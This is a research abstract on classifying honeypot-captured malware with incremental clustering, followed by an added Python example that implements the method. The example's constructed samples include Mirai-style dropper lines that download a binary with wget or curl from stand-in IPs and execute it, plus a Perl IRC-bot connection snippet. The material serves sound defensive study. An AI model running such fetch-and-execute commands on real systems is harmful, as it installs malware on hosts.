
A study of automatic malware classification based on an incremental clustering algorithm

Automatic malware classification based on incremental clustering algorithm

Abstract


In recent years, cybercriminals have continually developed new malware or produced variants in order to evade inspection by security mechanisms. Most current analysis methods examine only malware that consists of a single binary file and are not suited to the mixed source-code and binary malware captured by honeypots. There is still no effective and fast analysis tool for malware captured by honeypots. This study proposes a malware classification system that extracts the malware's source code and file structure as features and clusters the samples with an incremental clustering algorithm. The incremental clustering algorithm improves on the efficiency of hierarchical clustering, and the resulting clusters reveal whether a newly captured sample belongs to a known class or is a new type. To validate classification accuracy, this study compares its results against Virustotal, a well-known online virus detection and classification platform; the experiments show that the proposed classification outperforms Virustotal.

Abstract (English)


In recent years, cybercriminals have developed new malware or variants in order to evade inspection by security mechanisms. Most prior work focused on analyzing malware that consists of a single binary file. However, most honeypot-captured malware contains several binary and source files, so existing malware analysis approaches are not suitable for it. In this research, a novel malware classification approach is proposed that analyzes features extracted from the malware's file structure, source code, binary files and file names. An incremental clustering algorithm is developed to replace the traditional hierarchical clustering algorithm and improve efficiency. By means of the proposed system, when a honeypot captures new malware, IT security staff can tell whether it belongs to an existing cluster or not. To evaluate the proposed system, the approach is compared with Virustotal, a popular platform for malware detection and classification. The experimental results show that the proposed approach outperforms Virustotal.
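The abstract only names the feature sources (file structure, source code, binaries, file names) and the idea of placing each new capture against existing clusters one at a time. The following is an added illustration by the editor, not the paper's code: the feature set (file count, extensions, directory depth, file-name words, a coarse binary-format tag, word 3-grams of text files), the Jaccard similarity, the average-linkage rule and the 0.5 threshold are all assumptions chosen for the example, and the four "drops" are constructed samples, not real captures. It shows why the incremental scheme is cheaper than re-running hierarchical clustering (one pass over existing members per new sample) and how the "known family or new family" answer falls out of the threshold test.

```python
"""
Added example (not the paper's code): incremental clustering of honeypot
malware drops that mix scripts, source files and ELF binaries.

Each drop is a dict {relative path: bytes}. A new sample joins the cluster
whose members it resembles most (average Jaccard similarity) if that
similarity reaches THRESHOLD; otherwise it opens a new cluster. All
feature definitions and the threshold are assumptions for illustration.
"""
import re
from pathlib import PurePosixPath

THRESHOLD = 0.5  # assumed cut-off; the paper's abstract does not state one
WORD_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def extract_features(files):
    """Return a frozenset of string features for one captured drop."""
    feats = {f"nfiles:{len(files)}"}
    for path, data in files.items():
        p = PurePosixPath(path)
        feats.add(f"ext:{p.suffix.lower() or '<none>'}")
        feats.add(f"depth:{len(p.parts) - 1}")
        feats.update(f"name:{w}" for w in re.findall(r"[a-z]+", p.stem.lower()))
        if data.startswith(b"\x7fELF") and len(data) > 4:
            feats.add("bin:elf")
            feats.add(f"elfclass:{data[4]}")  # EI_CLASS: 1 = 32-bit, 2 = 64-bit
            continue
        if data.startswith(b"MZ"):
            feats.add("bin:pe")
            continue
        try:
            text = data.decode("utf-8")
        except UnicodeDecodeError:
            feats.add("bin:unknown")
            continue
        words = WORD_RE.findall(text)  # crude tokenizer for source/script text
        feats.update("src3:" + " ".join(words[i:i + 3]) for i in range(len(words) - 2))
    return frozenset(feats)


def jaccard(a, b):
    union = a | b
    return len(a & b) / len(union) if union else 1.0


class IncrementalClusterer:
    """Clusters are lists of (sample_id, features). Samples are placed one at
    a time, so each arrival costs O(n) comparisons against stored members
    instead of an O(n^2) hierarchical pass over the whole corpus."""

    def __init__(self, threshold=THRESHOLD):
        self.threshold = threshold
        self.clusters = []

    def add(self, sample_id, feats):
        """Return (cluster_index, is_new_family)."""
        best_idx, best_sim = None, 0.0
        for idx, members in enumerate(self.clusters):
            sim = sum(jaccard(feats, f) for _, f in members) / len(members)  # average linkage
            if sim > best_sim:
                best_idx, best_sim = idx, sim
        if best_idx is not None and best_sim >= self.threshold:
            self.clusters[best_idx].append((sample_id, feats))
            return best_idx, False
        self.clusters.append([(sample_id, feats)])
        return len(self.clusters) - 1, True


# Constructed samples (not real captures). The "\r\n" inside the Perl source
# stays as two literal characters, as it would in the file on disk.
ELF32_STUB = b"\x7fELF\x01\x01\x01" + bytes(9)  # first 16 bytes of an ELF32 header

IRC_PL_A = rb"""use IO::Socket;
my $server = "irc.example.net";
my $sock = IO::Socket::INET->new(PeerAddr => $server, PeerPort => 6667);
print $sock "NICK hound\r\n";
"""
# Variant: same bot with a different C2 host name and nick.
IRC_PL_B = IRC_PL_A.replace(b"irc.example.net", b"irc.example.org").replace(b"hound", b"drone")

SAMPLES = {
    "drop-A": {"bot/irc.pl": IRC_PL_A, "bot/run.sh": b"#!/bin/sh\nperl irc.pl &\n"},
    "drop-B": {"bot/irc.pl": IRC_PL_B, "bot/run.sh": b"#!/bin/sh\nperl irc.pl &\n"},
    "drop-C": {"bins/mirai.x86": ELF32_STUB, "bins/mirai.mips": ELF32_STUB,
               "bins.sh": b"#!/bin/sh\ncd /tmp; wget http://10.0.0.1/mirai.x86; chmod +x mirai.x86; ./mirai.x86\n"},
    "drop-D": {"bins/mirai.x86": ELF32_STUB, "bins/mirai.arm": ELF32_STUB,
               "bins.sh": b"#!/bin/sh\ncd /tmp; curl -O http://198.51.100.7/mirai.x86; chmod +x mirai.x86; ./mirai.x86\n"},
}


def classify(samples, threshold=THRESHOLD):
    """Feed samples in arrival order; return {sample_id: (cluster, is_new)}."""
    clusterer = IncrementalClusterer(threshold)
    return {sid: clusterer.add(sid, extract_features(files)) for sid, files in samples.items()}


if __name__ == "__main__":
    for sid, (cluster, is_new) in classify(SAMPLES).items():
        print(f"{sid}: cluster {cluster} ({'new family' if is_new else 'known family'})")
```

Running it places drop-A and drop-B (two builds of the same Perl IRC bot) in one cluster, opens a second cluster for the ELF dropper kit drop-C, and files drop-D (the same kit fetched with curl and shipping an ARM build) into that second cluster. Note that the downloader's IP address contributes nothing to the features here, which is deliberate: infrastructure churns faster than the kit itself, and a classifier keyed on hosts would split one family into many.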
